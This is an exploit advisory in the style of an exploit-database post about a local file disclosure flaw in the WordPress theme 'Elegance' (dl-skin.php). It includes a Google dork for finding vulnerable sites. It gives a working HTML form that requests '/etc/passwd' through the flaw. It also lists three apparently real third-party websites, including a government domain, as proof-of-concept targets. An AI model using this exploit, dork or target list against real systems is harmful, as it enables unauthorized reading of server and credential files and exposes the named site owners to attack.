[+] Post Local File Disclosure in wordpress theme Elegance 

[+] Date: 07/06/2014

[+] CWE Number: CWE-98

[+] Risk: High

[+] Author: Felipe Andrian Peixoto

[+] Dork:inurl:"/wp-content/themes/elegance/"

[+] Vendor Homepage: http://www.elegantthemes.com/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Linux

[+] Vulnerable File: dl-skin.php

[+] Exploit : 

<html>
<body>
<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>

[+] PoC: http://www.deverroh.com.br/site/wp-content/themes/elegance/lib/scripts/dl-skin.php
         http://mariogonzalez.med.br/wp-content/themes/elegance/lib/scripts/dl-skin.php
         http://www.floridapace.gov/wp-content/themes/elegance/lib/scripts/dl-skin.php


eof